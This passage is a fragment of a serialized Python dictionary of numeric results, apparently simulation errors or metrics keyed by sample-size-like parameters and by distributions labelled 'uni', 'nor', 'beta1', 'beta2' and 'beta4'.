0.6994344581806992, 'beta2': 0.750942354002658, 'beta4': 0.7099403799059699}}, 400: {1000: {'uni': 0.7364502180846917, 'nor': 2.284553312869663, 'beta1': 0.7541341170458651, 'beta2': 5.0818747242235025, 'beta4': 0.3900704329365574}, 750: {'uni': 0.7504698065388657, 'nor': 1.938239865343596, 'beta1': 0.7769598575433235, 'beta2': 4.01597780597472, 'beta4': 0.40395786312151927}, 500: {'uni': 0.7508573312104527, 'nor': 1.5072813162623548, 'beta1': 0.7305280496529544, 'beta2': 2.857026217797966, 'beta4': 0.4547828036658211}, 400: {'uni': 0.7611248206328712, 'nor': 1.338550267958856, 'beta1': 0.7466143672126452, 'beta2': 2.5495916012797935, 'beta4': 0.4969149207948216}, 300: {'uni': 0.7424343806561035, 'nor': 1.231111156552096, 'beta1': 0.7344575668422653, 'beta2': 2.0773636667154585, 'beta4': 0.5079339216262199}, 200: {'uni': 0.7392633158240819, 'nor': 1.0377847828667477, 'beta1': 0.7586003850660703, 'beta2': 1.6153253239719372, 'beta4': 0.5722234547809886}, 150: {'uni': 0.7391428468766339, 'nor': 0.9949906865630406, 'beta1': 0.7379552345583523, 'beta2': 1.3631500709552795, 'beta4': 0.619870387049708}, 100: {'uni': 0.7356451707387796, 'nor': 0.9291460091070943, 'beta1': 0.7404914473665879, 'beta2': 1.2174882328266758, 'beta4': 0.6262899546773785}, 75: {'uni': 0.7623057151977248, 'nor': 0.8361834398991281, 'beta1': 0.7501586532707593, 'beta2': 1.0872819013301396, 'beta4': 0.6478743366728121}, 50: {'uni': 0.74349850126654, 'nor': 0.8384065389830003, 'beta1': 0.7220703818527061, 'beta2': 0.9340745921343401, 'beta4': 0.6850260219180698}, 30: {'uni': 0.7149500790277772, 'nor': 0.7885112065199036, 'beta1': 0.7213375663568558, 'beta2': 0.8600427555686836, 'beta4': 0.6912613993017295}, 20: {'uni': 0.7221206453316641, 'nor': 0.7460966134674923, 'beta1': 0.7136641113944505, 'beta2': 0.8041327522868057, 'beta4': 0.7046152214673151}, 10: {'uni': 0.7078401582681484, 'nor': 0.7403186043135705, 'beta1': 0.7050250617326397, 'beta2': 0.7383220943967499, 'beta4': 0.6845552561458373}}, 300: {1000: {'uni': 0.7206526844832443, 'nor': 2.7942842452599153, 'beta1': 0.7527628702986627, 'beta2': 5.919411684201717, 'beta4': 0.3670485782403558}, 750: {'uni': 0.7509904630876584, 'nor': 2.2739045920462093, 'beta1': 0.7349341918106195, 'beta2': 4.652614303744448, 'beta4': 0.38740876912159744}, 500: {'uni': 0.7326172812992321, 'nor': 1.790945500928653, 'beta1': 0.763447968796166, 'beta2': 3.2504723882846553, 'beta4': 0.43389149620567713}, 400: {'uni': 0.7346001289882709, 'nor': 1.6118801882818838, 'beta1': 0.7632362935242065, 'beta2': 2.715944059333255, 'beta4': 0.44766620539659857}, 300: {'uni': 0.7427068448325751, 'nor': 1.4193407381871972, 'beta1': 0.72901308536521, 'beta2': 2.2921763593149125, 'beta4': 0.47478159208735254}, 200: {'uni': 0.7372729090295441, 'nor': 1.159679435034981, 'beta1': 0.7510674151033424, 'beta2': 1.8423392212461573, 'beta4': 0.526324417635601}, 150: {'uni': 0.7335555313519704, 'nor': 1.0189459141945576, 'beta1': 0.7774470798853989, 'beta2': 1.5526247983720354, 'beta4': 0.552793650767243}, 100: {'uni': 0.7525668267368835, 'nor': 0.9300778141862717, 'beta1': 0.7349045453993331, 'beta2': 1.2690620927247336, 'beta4': 0.6069832998899233}, 75: {'uni': 0.7398060192576016, 'nor': 0.8937269970573645, 'beta1': 0.7367240662850367, 'beta2': 1.114837775599423, 'beta4': 0.6227770244286678}, 50: {'uni': 0.7361907104794088, 'nor': 0.8467145891887228, 'beta1': 0.7532248025351025, 'beta2': 1.0076451242544675, 'beta4': 0.6677669182736204}, 30: {'uni': 0.7504149824828716, 'nor': 0.8049349990129249, 'beta1': 0.7188773766156613, 'beta2': 0.8917913915287613, 'beta4': 0.7002165400571294}, 20: {'uni': 0.7314574140964747, 'nor': 0.7817553909991105, 'beta1': 0.7162634938969795, 'beta2': 0.8408597207849396, 'beta4': 0.7160054524790228}, 10: {'uni': 0.7073627129526159, 'nor': 0.7221863363680757, 'beta1': 0.7204609453804969, 'beta2': 0.7558169384121463, 'beta4': 0.6931495140186302}}, 200: {1000: {'uni': 0.7423323084504223, 'nor': 3.9465111422421497, 'beta1': 0.748201229654901, 'beta2': 7.332126221988379, 'beta4': 0.3501525587156131}, 750: {'uni': 0.746653717649964, 'nor': 3.1892224661604938, 'beta1': 0.7624407304753418, 'beta2': 5.59235179871814, 'beta4': 0.34982032353631515}, 500: {'uni': 0.7357674078649882, 'nor': 2.251598080951371, 'beta1': 0.7423612184099468, 'beta2': 4.175521005731495, 'beta4': 0.3839217818127895}, 400: {'uni': 0.7395885933950936, 'nor': 2.0424085994835663, 'beta1': 0.7406447160909883, 'beta2': 3.2932035132001656, 'beta4': 0.40297503998297585}, 300: {'uni': 0.7577043809971838, 'nor': 1.6443666764703977, 'beta1': 0.7421027397774597, 'beta2': 2.669410854117533, 'beta4': 0.4276531839131966}, 200: {'uni': 0.7180965904307356, 'nor': 1.407264604807638, 'beta1': 0.7286293957187439, 'beta2': 2.1069547544377403, 'beta4': 0.4870983132798874}, 150: {'uni': 0.7553350101995575, 'nor': 1.1871616066279893, 'beta1': 0.7462056699655844, 'beta2': 1.723221575954481, 'beta4': 0.5273487385508362}, 100: {'uni': 0.7395542668424886, 'nor': 1.040812175501304, 'beta1': 0.7217865304155312, 'beta2': 1.3998981782184052, 'beta4': 0.5719653577277595}, 75: {'uni': 0.7179822358907298, 'nor': 0.9798839747009375, 'beta1': 0.7359864694464765, 'beta2': 1.2271310762157386, 'beta4': 0.5871809308583475}, 50: {'uni': 0.7375146921181255, 'nor': 0.9002210975474763, 'beta1': 0.7393499748203317, 'beta2': 1.0775344882196805, 'beta4': 0.6290086191247244}, 30: {'uni': 0.7169870394193528, 'nor': 0.8158188517233516, 'beta1': 0.7493460184747783, 'beta2': 0.9221767471669186, 'beta4': 0.6549135945910195}, 20: {'uni': 0.73449559591477, 'nor': 0.7810180014458455, 'beta1': 0.7420682468640403, 'beta2': 0.8780748276924514, 'beta4': 0.6867888053047261}, 10: {'uni': 0.7053108649778468, 'nor': 0.7526353976401546, 'beta1': 0.7177991673630623, 'beta2': 0.7604100266538812, 'beta4': 0.6792646013309229}}, 150: {1000: {'uni': 0.7743933245507701, 'nor': 4.870684976620477, 'beta1': 0.7493300795479252, 'beta2': 8.63035716657048, 'beta4': 0.338204647050127}, 750: {'uni': 0.7428327364622048, 'nor': 3.9085507502293373, 'beta1': 0.7529109429719044, 'beta2': 6.406659776251172, 'beta4': 0.3418060411939941}, 500: {'uni': 0.7331842699568302, 'nor': 2.8283847000054734, 'beta1': 0.7315010738620568, 'beta2': 4.49922268514765, 'beta4': 0.3652693771266238}, 400: {'uni': 0.7477876672889165, 'nor': 2.4408121466719894, 'beta1': 0.7486680909128302, 'beta2': 3.8227114105566447, 'beta4': 0.38605950916210385}, 300: {'uni': 0.7714775991116009, 'nor': 1.978646880908542, 'beta1': 0.7471424904471909, 'beta2': 3.044832497044965, 'beta4': 0.40485929874794896}, 200: {'uni': 0.731052318190657, 'nor': 1.6207811171212545, 'beta1': 0.7474999694752592, 'beta2': 2.2933245948022067, 'beta4': 0.46781899904078245}, 150: {'uni': 0.7500922612488313, 'nor': 1.3781581966330505, 'beta1': 0.7352960756488399, 'beta2': 1.9096599656675697, 'beta4': 0.4735125299169063}, 100: {'uni': 0.7279277122549193, 'nor': 1.1692830569706523, 'beta1': 0.7506006169362144, 'beta2': 1.5128965317553913, 'beta4': 0.5319456707433308}, 75: {'uni': 0.7325339806512801, 'nor': 1.0380383734066543, 'beta1': 0.7493119761616068, 'beta2': 1.343582314436481, 'beta4': 0.5737550750224671}, 50: {'uni': 0.7294430093006015, 'nor': 0.9505171237229544, 'beta1': 0.7510871675286181, 'beta2': 1.1329544178629671, 'beta4': 0.6122179404495601}, 30: {'uni': 0.7290644337093428, 'nor': 0.8806444792243782, 'beta1': 0.7296970766498079, 'beta2': 0.9661908520938478, 'beta4': 0.6575438710614618}, 20: {'uni': 0.7222168674984393, 'nor': 0.8420048253770901, 'beta1': 0.724515988463435, 'beta2': 0.8344804556030407, 'beta4': 0.660218564428112}, 10: {'uni': 0.7244918863210531, 'nor': 0.7443455406912518, 'beta1': 0.7195377603425277, 'beta2': 0.7882387387152024, 'beta4': 0.6599711359961713}}, 100: {1000: {'uni': 0.7553514817299303, 'nor': 7.1262210456290624, 'beta1': 0.7529581062774561, 'beta2': 10.253475634536954, 'beta4': 0.3192243144730889}, 750: {'uni': 0.7791294423924775, 'nor': 5.549089935079821, 'beta1': 0.7456036542941434, 'beta2': 7.819101615055815, 'beta4': 0.3181125557346874}, 500: {'uni': 0.7464390747429561, 'nor': 4.023411042911893, 'beta1': 0.719440888915879, 'beta2': 5.393933864641589, 'beta4': 0.3363492806120328}, 400: {'uni': 0.7436820550413948, 'nor': 3.2416913521011184, 'beta1': 0.7474703825572615, 'beta2': 4.366868426716757, 'beta4': 0.34793866437043924}, 300: {'uni': 0.7509432095906787, 'nor': 2.7020137466001795, 'beta1': 0.7409014752879322, 'beta2': 3.421463063906572, 'beta4': 0.36853309485013414}, 200: {'uni': 0.7530374509678488, 'nor': 1.960926209464229, 'beta1': 0.7241407264763559, 'beta2': 2.5782704085356767, 'beta4': 0.4078004886476791}, 150: {'uni': 0.7303983087222535, 'nor': 1.7191618969045015, 'beta1': 0.7347216143259169, 'beta2': 2.1185263308351763, 'beta4': 0.43491143509457303}, 100: {'uni': 0.7257742244079696, 'nor': 1.3801969840551045, 'beta1': 0.7176852231223901, 'beta2': 1.642329425975999, 'beta4': 0.48139070090467456}, 75: {'uni': 0.7517164534931338, 'nor': 1.1818603840334319, 'beta1': 0.7286890186729597, 'beta2': 1.4443184215810094, 'beta4': 0.5183068449522771}, 50: {'uni': 0.7621688606289894, 'nor': 1.0872999413300521, 'beta1': 0.7489827238342822, 'beta2': 1.1848949847718624, 'beta4': 0.5656741415128054}, 30: {'uni': 0.7298084592363608, 'nor': 0.9332998548420763, 'beta1': 0.7387444178885003, 'beta2': 1.0252251878747998, 'beta4': 0.6210582954782421}, 20: {'uni': 0.7441136225233612, 'nor': 0.8527112995573832, 'beta1': 0.7462672248306345, 'beta2': 0.913108948983176, 'beta4': 0.640746443418552}, 10: {'uni': 0.737481767799042, 'nor': 0.7654531340705115, 'beta1': 0.7209580518994956, 'beta2': 0.7703295902259096, 'beta4': 0.6595379429157052}}, 75: {1000: {'uni': 0.8074067248637035, 'nor': 8.982703727613933, 'beta1': 0.7462766315317871, 'beta2': 11.863615971347793, 'beta4': 0.30969669346453244}, 750: {'uni': 0.7905502080924112, 'nor': 7.0625027723964555, 'beta1': 0.7385904561393585, 'beta2': 8.813594802870487, 'beta4': 0.3083689380574924}, 500: {'uni': 0.7664044582012062, 'nor': 5.092979689603615, 'beta1': 0.734519756167919, 'beta2': 5.915617089146454, 'beta4': 0.32579897334383345}, 400: {'uni': 0.7643419874704518, 'nor': 4.082652680068739, 'beta1': 0.7280388893196177, 'beta2': 4.9326418878616085, 'beta4': 0.3443768536878751}, 300: {'uni': 0.7578970756907041, 'nor': 3.305189980415632, 'beta1': 0.7535727790132047, 'beta2': 3.8986893775132603, 'beta4': 0.3523585783087568}, 200: {'uni': 0.7627668279519347, 'nor': 2.366352321461588, 'beta1': 0.7478063096454467, 'beta2': 2.774930336104137, 'beta4': 0.37895595523501135}, 150: {'uni': 0.7551498483242116, 'nor': 2.0146806648840867, 'beta1': 0.715322504892067, 'beta2': 2.27236351355193, 'beta4': 0.4024298445706972}, 100: {'uni': 0.7394637596741217, 'nor': 1.526892470851258, 'beta1': 0.7534285806985298, 'beta2': 1.7401398926989977, 'beta4': 0.4449932415566237}, 75: {'uni': 0.7489504482916669, 'nor': 1.4189660002627995, 'beta1': 0.7590111719264389, 'beta2': 1.4816546253016176, 'beta4': 0.4799916438012694}, 50: {'uni': 0.7231634928736738, 'nor': 1.1665468171368905, 'beta1': 0.7205514516102951, 'beta2': 1.246946632314395, 'beta4': 0.528271236289555}, 30: {'uni': 0.6919736066483383, 'nor': 0.9752350712342117, 'beta1': 0.7326947145486271, 'beta2': 1.017214779212776, 'beta4': 0.6056915196333973}, 20: {'uni': 0.7321248137346815, 'nor': 0.8847322215404421, 'beta1': 0.7436111945765038, 'beta2': 0.9369344506464795, 'beta4': 0.6038200746587884}, 10: {'uni': 0.6999936271725347, 'nor': 0.8176052890572043, 'beta1': 0.7414589395343638, 'beta2': 0.7860543175475491, 'beta4': 0.6658013359881663}}, 50: {1000: {'uni': 0.9349315291336215, 'nor': 13.43691200121997, 'beta1': 0.7415667280225452, 'beta2': 14.529533357585608, 'beta4': 0.3020722643250528}, 750: {'uni': 0.8664297277263152, 'nor': 10.124177956990547, 'beta1': 0.7325637726044728, 'beta2': 10.705574218801685, 'beta4': 0.312164534002672}, 500: {'uni': 0.8012745715384612, 'nor': 7.101608627678545, 'beta1': 0.7482701388420466, 'beta2': 7.331886152921014, 'beta4': 0.3132485584859663}, 400: {'uni': 0.7993068988068693, 'nor': 5.876195499992661, 'beta1': 0.7360457214123197, 'beta2': 5.958198160314339, 'beta4': 0.3272571358134039}, 300: {'uni': 0.7699389442266666, 'nor': 4.551685320466588, 'beta1': 0.7579543434178201, 'beta2': 4.754383485607729, 'beta4': 0.33214677485760385}, 200: {'uni': 0.7737453062936557, 'nor': 3.2743330060587614, 'beta1': 0.7467458291008919, 'beta2': 3.3223709289687107, 'beta4': 0.35436399242374406}, 150: {'uni': 0.7490417235906979, 'nor': 2.6767446787215903, 'beta1': 0.7422159085910014, 'beta2': 2.644746427650133, 'beta4': 0.3714173165341442}, 100: {'uni': 0.7313624526865553, 'nor': 1.9870868548615173, 'beta1': 0.7285126816888758, 'beta2': 2.001888568131041, 'beta4': 0.3952418926791647}, 75: {'uni': 0.7172671987386803, 'nor': 1.6644805287512636, 'beta1': 0.7378322413195023, 'beta2': 1.7028170741593902, 'beta4': 0.43605827899361954}, 50: {'uni': 0.7253230461458138, 'nor': 1.3592272923869326, 'beta1': 0.7452200834032827, 'beta2': 1.3910336399973648, 'beta4': 0.48237565357444456}, 30: {'uni': 0.70803267861597, 'nor': 1.1549808891273663, 'beta1': 0.7232959969444372, 'beta2': 1.0990097769678915, 'beta4': 0.5413580844578947}, 20: {'uni': 0.7363216314094163, 'nor': 0.9876308421952716, 'beta1': 0.7438260730972865, 'beta2': 0.9306032071823038, 'beta4': 0.5831508780013659}, 10: {'uni': 0.7023687035868975, 'nor': 0.8443556631337041, 'beta1': 0.7158289089041515, 'beta2': 0.8017849117678024, 'beta4': 0.6252855701087432}}, 30: {1000: {'uni': 1.135433662003403, 'nor': 22.975611110150748, 'beta1': 0.7573893837030105, 'beta2': 17.74359800346252, 'beta4': 0.297757902293249}, 750: {'uni': 1.0311045283721894, 'nor': 16.483343618177887, 'beta1': 0.7534113622478869, 'beta2': 13.482644094659875, 'beta4': 0.30160940624087845}, 500: {'uni': 0.9139362430769883, 'nor': 11.705414821489235, 'beta1': 0.7484586324824043, 'beta2': 9.438769937249091, 'beta4': 0.3069397480593394}, 400: {'uni': 0.8855972092427258, 'nor': 9.037255267934396, 'beta1': 0.7733590733817911, 'beta2': 7.576713118210859, 'beta4': 0.3152328706658135}, 300: {'uni': 0.8498607707121014, 'nor': 7.206132571959497, 'beta1': 0.7418514574998677, 'beta2': 5.530582974473799, 'beta4': 0.31689463862324563}, 200: {'uni': 0.7917662970649914, 'nor': 5.077848982496681, 'beta1': 0.7304678805443476, 'beta2': 4.204779606913517, 'beta4': 0.3278334953907271}, 150: {'uni': 0.7910806456951968, 'nor': 4.004868875294406, 'beta1': 0.7261505015937928, 'beta2': 3.2079402231129976, 'beta4': 0.3447490181814188}, 100: {'uni': 0.7696591554811341, 'nor': 2.8972005461946866, 'beta1': 0.7297127847288362, 'beta2': 2.3363724000389023, 'beta4': 0.35895086880667004}, 75: {'uni': 0.7363424176614078, 'nor': 2.369420393366632, 'beta1': 0.7526904627618415, 'beta2': 1.9306149063833873, 'beta4': 0.3874230408263742}, 50: {'uni': 0.7096140875475437, 'nor': 1.792450944189413, 'beta1': 0.7162393369797683, 'beta2': 1.4435381512650722, 'beta4': 0.4180218110706144}, 30: {'uni': 0.6993735822894044, 'nor': 1.381219120953892, 'beta1': 0.7092864199251419, 'beta2': 1.1978302897457505, 'beta4': 0.4927113098977276}, 20: {'uni': 0.6854105477122527, 'nor': 1.1684502381086352, 'beta1': 0.7297155809453436, 'beta2': 0.9860055568654263, 'beta4': 0.5218496571816182}, 10: {'uni': 0.6769793341065574, 'nor': 0.9298827298857523, 'beta1': 0.6991421468165611, 'beta2': 0.8384852567044772, 'beta4': 0.5911355331329511}}, 20: {1000: {'uni': 1.5422767881732407, 'nor': 33.623007842941036, 'beta1': 0.8076770761473828, 'beta2': 21.81645368130898, 'beta4': 0.29400214136669206}, 750: {'uni': 1.3565649257548582, 'nor': 25.500787968320108, 'beta1': 0.7836354489834423, 'beta2': 17.05613211546847, 'beta4': 0.2953552404790611}, 500: {'uni': 1.1554066269622438, 'nor': 17.366509269093996, 'beta1': 0.7653357621752842, 'beta2': 11.45041336876129, 'beta4': 0.3037530374927966}, 400: {'uni': 1.0737530948566782, 'nor': 13.540388043219384, 'beta1': 0.7654090294473117, 'beta2': 9.518851192493647, 'beta4': 0.30367790135580414}, 300: {'uni': 0.9765351746747871, 'nor': 10.717684596621698, 'beta1': 0.7362009325282473, 'beta2': 7.150808242448672, 'beta4': 0.3124982191238184}, 200: {'uni': 0.9002188501928331, 'nor': 7.062770475092731, 'beta1': 0.7397883860335908, 'beta2': 4.777154184591877, 'beta4': 0.3159112478562884}, 150: {'uni': 0.8335790056399025, 'nor': 5.58483897460766, 'beta1': 0.7460132208826435, 'beta2': 3.7165330190336245, 'beta4': 0.31991308480594854}, 100: {'uni': 0.7937288019209847, 'nor': 3.9655772323210314, 'beta1': 0.7411963443373258, 'beta2': 2.7650571950679814, 'beta4': 0.3337932064372245}, 75: {'uni': 0.7633892696634527, 'nor': 3.175438383816786, 'beta1': 0.7017838867635625, 'beta2': 2.1935080303965084, 'beta4': 0.35892212583393873}, 50: {'uni': 0.727388616390112, 'nor': 2.3492749534444273, 'beta1': 0.7307786603085943, 'beta2': 1.6613293154255553, 'beta4': 0.3860365833166761}, 30: {'uni': 0.7221576207335421, 'nor': 1.7443088681216943, 'beta1': 0.7203994812969841, 'beta2': 1.228838728852705, 'beta4': 0.4307713330938513}, 20: {'uni': 0.7041433273507007, 'nor': 1.3875298207339808, 'beta1': 0.7244642373998895, 'beta2': 1.0943181325266345, 'beta4': 0.4811743703599059}, 10: {'uni': 0.7012223644343135, 'nor': 1.0245301878477195, 'beta1': 0.6986917466557336, 'beta2': 0.8714720199283585, 'beta4': 0.5538253794857232}}, 10: {1000: {'uni': 3.3860305779409425, 'nor': 69.12629967805236, 'beta1': 1.3311840432830941, 'beta2': 31.886608192512867, 'beta4': 0.30148004390899985}, 750: {'uni': 2.760308940939271, 'nor': 52.32712111436736, 'beta1': 1.1485351997801594, 'beta2': 23.88091780382947, 'beta4': 0.3007675448851966}, 500: {'uni': 2.1187788625497666, 'nor': 34.12244249918099, 'beta1': 0.9875632983483154, 'beta2': 16.303450154076117, 'beta4': 0.29315714851845276}, 400: {'uni': 1.812743282248588, 'nor': 27.535347493750546, 'beta1': 0.9603589961065766, 'beta2': 12.942852748453202, 'beta4': 0.2995636993008456}, 300: {'uni': 1.5698543440275912, 'nor': 20.31822234635588, 'beta1': 0.868758435808308, 'beta2': 9.943250031735536, 'beta4': 0.2966653980441081}, 200: {'uni': 1.2831488048321131, 'nor': 14.727951422793442, 'beta1': 0.8356737691150327, 'beta2': 6.740556657840313, 'beta4': 0.2943697452228861}, 150: {'uni': 1.1268925713293234, 'nor': 10.597118226400635, 'beta1': 0.8108033084059241, 'beta2': 5.115279274356808, 'beta4': 0.31424178539635517}, 100: {'uni': 0.9635160740767054, 'nor': 7.301349015655083, 'beta1': 0.7560708487156951, 'beta2': 3.648381304348421, 'beta4': 0.3048069455780913}, 75: {'uni': 0.8838515573613532, 'nor': 5.74338502795036, 'beta1': 0.744462441212371, 'beta2': 2.818074827786014, 'beta4': 0.3212073081339402}, 50: {'uni': 0.8291338828064758, 'nor': 3.9533981841058488, 'beta1': 0.7380188306751617, 'beta2': 2.094258280901449, 'beta4': 0.3292230380642782}, 30: {'uni': 0.7644312433974103, 'nor': 2.720441186648777, 'beta1': 0.7113163970445261, 'beta2': 1.5020958427312148, 'beta4': 0.3621051408260878}, 20: {'uni': 0.7031423578740116, 'nor': 2.1168935580804584, 'beta1': 0.7043135043678577, 'beta2': 1.1671964551964154, 'beta4': 0.3941268196263035}, 10: {'uni': 0.6876344879848008, 'nor': 1.3628066525293088, 'beta1': 0.6874249300009232, 'beta2': 0.8861925569465577, 'beta4': 0.46282421765776804}}}, 0.1: {1000: {1000: {'uni': 0.34522862285111255, 'nor': 0.6228395073147752, 'beta1': 0.3491475301557177, 'beta2': 1.8016479493371311, 'beta4': 0.24424001680972462}, 750: {'uni': 0.34067029159943607, 'nor': 0.5499598659017021, 'beta1': 0.3486635011755686, 'beta2': 1.3479403032586368, 'beta4': 0.256937225000032}, 500: {'uni': 0.3464084343284053, 'nor': 0.47208323276435604, 'beta1': 0.3459987511001463, 'beta2': 0.9576128375739897, 'beta4': 0.2758735009645715}, 400: {'uni': 0.3523467281914471, 'nor': 0.4515226651894629, 'beta1': 0.3519476796699666, 'beta2': 0.7978696641078354, 'beta4': 0.2864827600190153}, 300: {'uni': 0.3477454390980137, 'nor': 0.423596083058182, 'beta1': 0.3465963700708253, 'beta2': 0.6876688970007049, 'beta4': 0.2976169379574473}, 200: {'uni': 0.3445409313119668, 'nor': 0.4030581972395861, 'beta1': 0.3492651184466396, 'beta2': 0.5551933075253935, 'beta4': 0.31556439238679485}, 150: {'uni': 0.3498705624747738, 'nor': 0.3918102011857414, 'beta1': 0.3456677542317484, 'beta2': 0.49624702752060124, 'beta4': 0.3242273287196293}, 100: {'uni': 0.3436893083795591, 'nor': 0.37284776795342023, 'beta1': 0.34771284546605924, 'beta2': 0.4466105146595203, 'beta4': 0.32803306387910325}, 75: {'uni': 0.3475867160617753, 'nor': 0.36340645271259714, 'beta1': 0.34938185672749816, 'beta2': 0.4170327188966793, 'beta4': 0.32843949400931977}, 50: {'uni': 0.35055629128861204, 'nor': 0.35940286705773605, 'beta1': 0.34632894455437757, 'beta2': 0.3950444302670791, 'beta4': 0.3380127773421535}, 30: {'uni': 0.34398236878275323, 'nor': 0.3513554868714947, 'beta1': 0.34746531457584257, 'beta2': 0.37326172618762804, 'beta4': 0.3377301023189335}, 20: {'uni': 0.35212346707498915, 'nor': 0.3491050335472612, 'beta1': 0.33698617941167014, 'beta2': 0.36496711101835394, 'beta4': 0.3399147522136969}, 10: {'uni': 0.3455385083140642, 'nor': 0.3550667091655473, 'beta1': 0.3455192835205828, 'beta2': 0.3588059524171947, 'beta4': 0.34715372359343916}}, 750: {1000: {'uni': 0.34909526053327966, 'nor': 0.7000192716607003, 'beta1': 0.3436461639650576, 'beta2': 1.7826637593470094, 'beta4': 0.23043671233693377}, 750: {'uni': 0.3521350266061196, 'nor': 0.6065082789810716, 'beta1': 0.3477266969960249, 'beta2': 1.3463479370664821, 'beta4': 0.24140925534497648}, 500: {'uni': 0.3407122010380868, 'nor': 0.5269610372045576, 'beta1': 0.3460101335915343, 'beta2': 0.9369997288365739, 'beta4': 0.2617272822804359}, 400: {'uni': 0.34515571530717193, 'nor': 0.47877303335524596, 'beta1': 0.34752902436605043, 'beta2': 0.8230256289242237, 'beta4': 0.2700214004987484}, 300: {'uni': 0.3483072253851639, 'nor': 0.44993562666728104, 'beta1': 0.349268527034077, 'beta2': 0.6926501525691608, 'beta4': 0.2853686593826423}, 200: {'uni': 0.3470296256996466, 'nor': 0.4196297568242823, 'beta1': 0.34021112730517444, 'beta2': 0.562300202363076, 'beta4': 0.2998847086772037}, 150: {'uni': 0.3464761692956304, 'nor': 0.4042287728631724, 'beta1': 0.3452130359466471, 'beta2': 0.5089640450206934, 'beta4': 0.3081680855306012}, 100: {'uni': 0.35076633420093445, 'nor': 0.378135460048976, 'beta1': 0.3508849050425952, 'beta2': 0.45863169971558315, 'beta4': 0.31859381410486026}, 75: {'uni': 0.3436998033966782, 'nor': 0.3766331003411186, 'beta1': 0.3470801575318038, 'beta2': 0.4256019265347618, 'beta4': 0.33483905786401014}, 50: {'uni': 0.344343221396323, 'nor': 0.3561890060241063, 'beta1': 0.3445446190015034, 'beta2': 0.3984536383725175, 'beta4': 0.33210741741488403}, 30: {'uni': 0.34480539602579574, 'nor': 0.3574621127262308, 'beta1': 0.3463821171864507, 'beta2': 0.37860713383012484, 'beta4': 0.34241644586079795}, 20: {'uni': 0.3492479116908845, 'nor': 0.3468836182897213, 'beta1': 0.3470397303687519, 'beta2': 0.3771778056363512, 'beta4': 0.34309117628812213}, 10: {'uni': 0.34716489049413923, 'nor': 0.34726854629110016, 'beta1': 0.3419429175321523, 'beta2': 0.35692148413605357, 'beta4': 0.34471917186703666}}, 500: {1000: {'uni': 0.34980366649542444, 'nor': 0.8828084069791858, 'beta1': 0.34530404469333964, 'beta2': 2.0390420881992393, 'beta4': 0.21060713902409867}, 750: {'uni': 0.34562049614934987, 'nor': 0.7441575486111333, 'beta1': 0.3446423604936914, 'beta2': 1.5454359942202134, 'beta4': 0.2246312059363231}, 500: {'uni': 0.3499479954535063, 'nor': 0.6104516800045718, 'beta1': 0.34661641393000875, 'beta2': 1.115591239340158, 'beta4': 0.24370751974629912}, 400: {'uni': 0.34623159080404736, 'nor': 0.5643795655935262, 'beta1': 0.34395608282034135, 'beta2': 0.9504329301967376, 'beta4': 0.250956210503198}, 300: {'uni': 0.3425969194301464, 'nor': 0.5049407623024504, 'beta1': 0.35235321689257676, 'beta2': 0.7939578647402028, 'beta4': 0.2683519210299116}, 200: {'uni': 0.3430607177495854, 'nor': 0.44879745877719035, 'beta1': 0.34501529777041695, 'beta2': 0.6292580338502747, 'beta4': 0.2855608768253181}, 150: {'uni': 0.34587642193397855, 'nor': 0.4204615533940365, 'beta1': 0.34164713670280794, 'beta2': 0.5737249925775849, 'beta4': 0.2971573193037079}, 100: {'uni': 0.34238445175117393, 'nor': 0.39388029037529504, 'beta1': 0.34902341792659347, 'beta2': 0.48221913721243437, 'beta4': 0.31469965931902977}, 75: {'uni': 0.3467116122075039, 'nor': 0.38817290389677783, 'beta1': 0.3517222324649411, 'beta2': 0.4486988314905505, 'beta4': 0.32065899569382833}, 50: {'uni': 0.3448974429488288, 'nor': 0.376999764119375, 'beta1': 0.34970045899172114, 'beta2': 0.4136016266145007, 'beta4': 0.3315402268547066}, 30: {'uni': 0.3450763942702253, 'nor': 0.359582406629779, 'beta1': 0.3475273188847172, 'beta2': 0.381992042961191, 'beta4': 0.3323036796222379}, 20: {'uni': 0.34867510464529977, 'nor': 0.35014087360264345, 'beta1': 0.34548306845712595, 'beta2': 0.3741498903455569, 'beta4': 0.33936857819735566}, 10: {'uni': 0.3389678071344472, 'nor': 0.3462171225002532, 'beta1': 0.3461858964125291, 'beta2': 0.35768688824311, 'beta4': 0.3454448002505371}}, 400: {1000: {'uni': 0.3412747607815299, 'nor': 1.0177178883630658, 'beta1': 0.3438242054634319, 'beta2': 1.9913254002158856, 'beta4': 0.20113561884912903}, 750: {'uni': 0.3490577726510959, 'nor': 0.8509827458513439, 'beta1': 0.34652921822246546, 'beta2': 1.5201078157253372, 'beta4': 0.211333303577262}, 500: {'uni': 0.34798773863259724, 'nor': 0.6755895166899817, 'beta1': 0.3473790211653727, 'beta2': 1.0987363289188878, 'beta4': 0.23196600902080236}, 400: {'uni': 0.3489527480495489, 'nor': 0.6044191427433583, 'beta1': 0.3467577402388518, 'beta2': 0.9335980474056014, 'beta4': 0.24488800695361335}, 300: {'uni': 0.3471155869537724, 'nor': 0.5508015092134401, 'beta1': 0.34424189925102483, 'beta2': 0.7935271208610247, 'beta4': 0.25747813877459824}, 200: {'uni': 0.3445568797042115, 'nor': 0.4675967309526432, 'beta1': 0.3500645313101199, 'beta2': 0.6739017550399186, 'beta4': 0.2743681532845661}, 150: {'uni': 0.35361449117436006, 'nor': 0.4511309221562023, 'beta1': 0.3462218569002684, 'beta2': 0.5791382939670757, 'beta4': 0.2887616378271954}, 100: {'uni': 0.34500319374883415, 'nor': 0.41178634546653503, 'beta1': 0.34728954575526966, 'beta2': 0.5011804138006778, 'beta4': 0.3034732161183125}, 75: {'uni': 0.34557108489320804, 'nor': 0.3989063728632237, 'beta1': 0.3470788068835562, 'beta2': 0.4569511082377164, 'beta4': 0.3171266416110887}, 50: {'uni': 0.3469017207004219, 'nor': 0.38520506727358106, 'beta1': 0.34612160245120194, 'beta2': 0.41185340415894384, 'beta4': 0.32620775126216733}, 30: {'uni': 0.34632131112233244, 'nor': 0.36585499457591303, 'beta1': 0.3444607742924859, 'beta2': 0.3889474502225472, 'beta4': 0.3336066143492354}, 20: {'uni': 0.3502013005709345, 'nor': 0.36446150318855836, 'beta1': 0.3479197101489542, 'beta2': 0.3737133387595116, 'beta4': 0.3364565889405686}, 10: {'uni': 0.34007066527671714, 'nor': 0.349271960957368, 'beta1': 0.33995922081352276, 'beta2': 0.36095135551696184, 'beta4': 0.3422350611007681}}, 300: {1000: {'uni': 0.34780248511164635, 'nor': 1.2459233986726455, 'beta1': 0.34744144501755014, 'beta2': 2.2084838579165464, 'beta4': 0.189081472987699}, 750: {'uni': 0.34654011205832125, 'nor': 